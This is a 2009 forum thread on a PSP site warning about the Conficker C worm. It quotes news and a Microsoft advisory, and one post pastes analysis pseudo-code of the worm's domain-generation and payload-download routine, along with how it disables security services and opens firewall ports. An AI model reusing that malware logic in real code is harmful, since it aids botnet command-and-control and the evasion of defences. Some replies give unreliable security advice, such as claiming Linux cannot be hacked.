Thread: Heads up! Conficker worm!

Page 1 of 2 12 LastLast
Results 1 to 15 of 27
  1. #1 Heads up! Conficker worm! 
    Senior Member PSP Mad Hacker -The_King-'s Avatar
    Join Date
    Dec 2008
    Posts
    517
    Beware Conficker worm come April 1.

    Quote Originally Posted by yahoo
    In an event that hits the computer world only once every few years, security experts are racing against time to mitigate the impact of a bit of malware which is set to wreak havoc on a hard-coded date. As is often the case, that date is April 1.

    Malware creators love to target April Fool's Day with their wares, and the latest worm, called Conficker C, could be one of the most damaging attacks we've seen in years.

    Conficker first bubbled up in late 2008 and began making headlines in January as known infections topped 9 million computers. Now in its third variant, Conficker C, the worm has grown incredibly complicated, powerful, and virulent... though no one is quite sure exactly what it will do when D-Day arrives.

    Thanks in part to a quarter-million-dollar bounty on the head of the writer of the worm, offered by Microsoft, security researchers are aggressively digging into the worm's code as they attempt to engineer a cure or find the writer before the deadline. What's known so far is that on April 1, all infected computers will come under the control of a master machine located somewhere across the web, at which point anything's possible. Will the zombie machines become denial of service attack pawns, steal personal information, wipe hard drives, or simply manifest more traditional malware pop-ups and extortion-like come-ons designed to sell you phony security software? No one knows.

    Conficker is clever in the way it hides its tracks because it uses an enormous number of URLs to communicate with HQ. The first version of Conficker used just 250 addresses each day -- which security researchers and ICANN simply bought and/or disabled -- but Conficker C will up the ante to 50,000 addresses a day when it goes active, a number which simply can't be tracked and disabled by hand.

    At this point, you should be extra vigilant about protecting your PC: Patch Windows completely through Windows Update and update your anti-malware software as well. Make sure your antivirus software is actually running too, as Conficker may have disabled it.

    Microsoft also offers a free online safety scan here, which should be able to detect all Conficker versions.
    For the nerds: Conficker C Analysis | Technical Report

    Quote Originally Posted by Microsoft
    Conficker Activity Update

    There’s been a lot of activity today around the Conficker worm here at Microsoft and across the industry. I wanted to give everyone a quick, high-level overview on what’s been going on today.

    First, today we’re making public, the work we and many other industry and academic partners have been doing behind the scenes to help combat the Conficker worm.

    Second, we’ve provided additional information from our research to our Microsoft Active Protections Program (MAPP) partners and our Microsoft Security Response Alliance (MSRA) partners and posted it to the MSRC weblog in an effort to help customers and other researchers.

    Finally, we have announced a US$250,000 reward for information that results in the arrest and conviction of those responsible for illegally launching the Conficker worm. Individuals with information about the Conficker worm are encouraged to contact their international law enforcement agencies. Additionally, Microsoft has implemented an Antivirus Reward Hotline, 1-425-706-1111, and an Antivirus Reward Mailbox, avreward@microsoft.com, where tips can be shared.

    The work that we’ve done with industry and academic partners and the additional information that we’ve provided all relate to the same thing: disrupting the Conficker worm’s attempts to connect to domains on the Internet after successfully attacking a system. By understanding the algorithm that the Conficker worm uses to generate the domain names that infected systems attempt to connect to, we can take steps to disrupt the Conficker worm by blocking access to those domains by infected systems.

    We have worked with ICANN and operators within the domain name system to proactively disable a significant number of domains that systems infected by the Conficker worm would try to connect to.

    We have also made information about the algorithm and the list of domain names available so that security researchers and customers can review logs to identify infected systems connecting to these domains and proactively block access to these domains.

    As someone involved in security response for a number of years, it’s exciting for me to see the industry come together to take an innovative, new approach to combating malware. It helps prove again that while threats may be evolving, so too is our response as an industry to these threats.

    Thanks.
    Christopher

    Updated 2/14/2009 with contact information regarding Antivirus Reward
    *This posting is provided "AS IS" with no warranties, and confers no rights*

    Yeah.
    Try not to download anything from sites you're know that they're not 100% safety!
    Reply With Quote  
     

  2. #2  
    Homebrew Creator PSP Elite Hacker Mobster's Avatar
    Join Date
    Dec 2008
    Posts
    1,716
    so like qj is fine
    Left4Quake donation complete!

    Left 4 Dead on PSP!
    Reply With Quote  
     

  3. #3  
    Junior Member PSP User mwgplyr's Avatar
    Join Date
    Mar 2009
    Posts
    29
    Just dont mess around with limewire or torrents (-aXXo-s fine just check hashes)... scan your pc and if you find the worm USE SOMETHING CALLED WARRENTY or INSURANCE DO NOT TRY TO GET RID OF THE WORM YOURSELF! if you dont have insurance get it before D-Day.

    EDIT: it seems as tho from my understanding that the worm uses a a set of domains ( could b thousands...) and then splits to 50k IPs making it over 1 Mil+ possible IPs most of them (almost all but like 2k would b web-based dummy codes

    int domain_name_generation()
    {
    // local declarations
    hMem = 0;
    check_if_MS_DEF_PROV();
    get_time_from_popular_web_sites();
    // baidu.com, google.com, yahoo.com, ask.com, w3.org,
    // facebook.com, imageshack.us, rapidshare.com

    hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
    if ( hMem )
    {
    while ( 1 )
    {
    counter_domains = counter;
    if ( counter >= 50000 )
    break;

    size_of_name = DGA_random_function() % 6 + 4;
    // size of domain name is between 4 and 10 chars
    // append "." at the end of the name
    random = DGA_random_function();
    strcat(domainname, TLD-suffix[random num % 116] );
    // append 1 of 116 suffixes (from 110 TLDs) to domain name
    ++counter;
    }

    // select and query 500 domains
    counter_domains = 0;
    while ( !success_download && counter_domains < 500 )
    {
    // random number modulo 50,000
    one_in_50000_names = conficker_D_PRNG_function() % 50,000);
    hostent = gethostbyname(one_in_50000_names);
    // resolve name to a set of IP addresses
    if ( hostent )
    {
    host_address = hostent->address_list; // get list of IPs
    array_previously_checked_IPs[counter_domains] = host_address;

    if ( *host_address )
    {
    // skip if domain name resolves to multiple IP addresses
    if ( !*(host_address + 1) )
    {
    // skip if IP is local host or other trivial IPs
    if ( check_IP_value(host_address) )
    {
    is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
    // skip if IP is blacklisted
    if ( ! is_blacklisted_ip )
    {
    found = 0;
    index = 0;
    while (index < counter_domains )
    {
    if (host_address == array_previously_checked_IPs[index] )
    {
    found = 1;
    break; // break if IP has been previously encountered
    }
    ++index;
    }
    // skip if IP has been previously encountered
    if ( !found )
    {
    snprintf(Dest, 0x80u, "http://%s", host_address);
    success_download = download_and_validate_file(Dest);
    // HTTP request to the domain and download valid file
    }
    }
    }
    }
    }
    }
    Sleep(...); // sleep small random amount
    ++counter_domains;
    }
    }
    GlobalFree(hMem);
    return success_download;
    }
    EDIT: It also disables detection by basically all virus scanners ... even other viruses

    Domain Lookup Prevention

    At each process initialization, Conficker C applies an in-memory patch to dnsapi.dll (Windows XP, 2K) or dnsrslvr.dll (Vista). It does not patch the DLL files on the filesystem, only their in-memory instances. These DLLs contain the standard Windows APIs for domain name resolution and caching. Conficker modifies Window's DNS lookup and cache services to prevent successful communications with various security product vendors and research sites. The list of blocked domain lookups is shown in Table 1.
    Windows Security Service Disablement

    Each time it starts, Conficker C spawns a thread to disable security services and terminate Conficker removal software. This thread is responsible for disabling Windows services that deliver security patches and software updates, effectively preventing the victim host from receiving automated software updates. For example, in addition to disabling Windows Defender and the Windows error reporting service, this logic disables BITS (Background Intelligent Transfer Service). The BITS service is used to prioritize, throttle, and control asynchronous file transfers between machines using idle network bandwidth. It is used by the Windows Update services and other software updaters to stay current with the latest patches and security hot fixes.

    Figure 6 provides a pseudo-code summary of the security disablement thread. The main program logic is shown in function disable_security_services_and_terminate_conficker_ cleaners(). This function disables Windows Security Center Service (wscsvc), Windows Defender Service (WinDefend), Windows Automatic Update Service (wuauserv), BITS (Background Intelligent Transfer Service), Windows Error Reporting Service (ERSvc), and the Windows Error Reporting Service (WerSvc). It further deletes Windows Defender from the Run Registry Key, deactivates security center notifications (FD6905CE-952F-41F1-9A6F-135D9C6622CC), and deletes the safeboot security key. It then spawns the monitor_and_terminate_conficker_cleaners thread, discussed in Security Product Terminator Thread.

    The disable_security_service pseudo-code is also show in Figure 6. This function Illustrates the actual logic used to disable the five security services. First, C opens the security manager with all access privileges. It then loops through the set of resident services, ignoring all services reported as kernel devices. If it finds a matching device name, it first shuts down the service, sleeps for 4 seconds, and then sets the service configuration to permanently disable the service.
    Hell it even destroys your firewall:

    Firewall Disablement
    To interact with external clients during P2P communications, C disables the blocking of several high-order TCP and UDP application ports. This is done through HKLM modifications, where the opened ports are listed in the GloballyOpenPorts registry key. These ports are fixed per Conficker installation. The following is an example set of firewall modifications made during a Conficker C run:

    SYSTEM\CurrentControlSet\Services\SharedAccess\Par ameters\FirewallPolicy\StandardProfile\GloballyOpe nPorts\List, Value Name: 11930:TCP, New Value: 11930:TCP:*:Enabled:PackagesOffice MSDownloaded

    SYSTEM\CurrentControlSet\Services\SharedAccess\Par ameters\FirewallPolicy\StandardProfile\GloballyOpe nPorts\List, Value Name: 45436:TCP, New Value: 45436:TCP:*:Enabled:PackagesOffice SpeechGames

    SYSTEM\CurrentControlSet\Services\SharedAccess\Par ameters\FirewallPolicy\StandardProfile\GloballyOpe nPorts\List, Value Name: 48481:UDP, New Value: 48481:UDP:*:Enabled:PackagesOffice PagesPages

    SYSTEM\CurrentControlSet\Services\SharedAccess\Par ameters\FirewallPolicy\StandardProfile\GloballyOpe nPorts\List, Value Name: 57338:UDP, New Value: 57338:UDP:*:Enabled:PackagesOffice MediaDistribution

    Listed with these firewall port disablement changes are apparent product package names, such as MSDownloaded, SpeechGames, MediaDistribution, and PagesPages. These package names are bogus, and appear to associate these security changes to software packages that appear benign.
    Get ready for complete ownage...
    Last edited by mwgplyr; 03-29-2009 at 08:55 PM.
    PSP 2.71>1.50>3.71 m33>3.71m33-4>5.00 m33>5.00 m33-6



    Evilzone.org staus: Down but currently rebuilding pages with more stable security


    If you hit Ctrl+W, you can see the rest of my sig...
    Reply With Quote  
     

  4. #4  
    Senior Member PSP Mad Hacker mrbob3's Avatar
    Join Date
    Oct 2008
    Posts
    641
    I remember people getting worried on the 31st december 1999..........
    Reply With Quote  
     

  5. #5  
    Senior Member I Modded My PSP TR1X's Avatar
    Join Date
    Apr 2008
    Posts
    359
    The obvious solution is a good can of worm repellent!

    god those nerds never think of the common sense solutions :P
    My Gaming Blog

    March 29th 09' = My 300th Post

    My Baby
    Reply With Quote  
     

  6. #6  
    Senior Member I Modded My PSP Omega_redest's Avatar
    Join Date
    Nov 2008
    Posts
    411
    Use Nod anti virus
    Threat fire
    and reg cure..

    it cleared my pc from this a few weeks ago

    As a defence combo, it has proved it self many times "only the best for my pc"
    Last edited by Omega_redest; 03-29-2009 at 10:40 PM.
    Reply With Quote  
     

  7. #7  
    Member PSP User
    Join Date
    Mar 2009
    Posts
    34
    It seems kind of convenient to be on April 1st. I mean really. Someone must have some good time to kill to want to make a joke or something of this size. I don't think there's much else it could do to my old piece of junk though.
    Hey now it's not all bad. You could be stuck in quicksand up to your neck...and not sink any further.
    Reply With Quote  
     

  8. #8  
    Senior Member PSP Mad Hacker -The_King-'s Avatar
    Join Date
    Dec 2008
    Posts
    517
    Quote Originally Posted by Mitochondria View Post
    Probably all bullshit, and just an april fools day joke. Making every paranoid as hell.
    You know that the Virus EXISTS!?
    And maybe it's already on your computer.. if you got windows ^^

    Well, we'll see what happens in 2 days..
    I'm excited
    Reply With Quote  
     

  9. #9  
    I want it all, brand new socks and draws! PSP Mad Hacker thecoo1est's Avatar
    Join Date
    Jul 2008
    Posts
    586
    Well I keep everything that means something on another drive, so if I get the worm Ill format that motherfu*ker
    Reply With Quote  
     

  10. #10  
    Senior Member PSP Elite Hacker Kaikz's Avatar
    Join Date
    Nov 2008
    Posts
    4,882
    all u do is get the ubuntu live cd and install inside windows and use that for a while, linux cant be hacked, u can access all of ur windows files and use them if u install wine
    Reply With Quote  
     

  11. #11  
    Senior Member I Modded My PSP TR1X's Avatar
    Join Date
    Apr 2008
    Posts
    359
    Ubuntu users is safe
    My Gaming Blog

    March 29th 09' = My 300th Post

    My Baby
    Reply With Quote  
     

  12. #12  
    Senior Member PSP Elite Hacker Kaikz's Avatar
    Join Date
    Nov 2008
    Posts
    4,882
    i alredy got a live cd
    Reply With Quote  
     

  13. #13  
    Senior Member I Modded My PSP TR1X's Avatar
    Join Date
    Apr 2008
    Posts
    359
    I converted about a year ago now my laptops, desktops, and server all run ubuntu
    My Gaming Blog

    March 29th 09' = My 300th Post

    My Baby
    Reply With Quote  
     

  14. #14  
    Senior Member I Modded My PSP Omega_redest's Avatar
    Join Date
    Nov 2008
    Posts
    411
    Conficker is real and f&%S you up completely
    Reply With Quote  
     

  15. #15  
    Senior Member I Modded My PSP Stgdemon's Avatar
    Join Date
    May 2008
    Posts
    370
    Sounds like Y2K all over again, lol! (not saying it's not real, but I'm sure they'll get it fixed soon enough)
    Made Switchable Pandora
    Piano Black slim with Undead Decal
    Firmware Piano Black 3.82>3.71M33>4.01M33-2>5.00M33-6>5.50GEN-B2 ~
    Red GoW addition 3.71>3.72m33-2>5.00m33-6 ~
    Grey 4.01>5.00m33-6

    UV Trigger and door LED's


    Reply With Quote  
     

Page 1 of 2 12 LastLast

Similar Threads

  1. Was i hit with some kind of worm?
    By Sullivan in forum Technical Discussion
    Replies: 13
    Last Post: 02-19-2009, 05:54 PM
  2. Hello Fellow Mod Heads
    By phunetik in forum Introduce Yourself
    Replies: 4
    Last Post: 06-03-2008, 04:24 PM
  3. Heads up if your looking for a copy of Lumines
    By rick22 in forum PSP Hardware & Repair
    Replies: 3
    Last Post: 06-27-2007, 08:36 PM
  4. heads spinning now
    By whiskey18 in forum PSP Hardware & Repair
    Replies: 1
    Last Post: 01-31-2007, 01:23 PM
  5. Turn heads
    By Dende00 in forum Off-Topic Discussion
    Replies: 0
    Last Post: 06-25-2006, 02:15 AM
Posting Permissions
  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •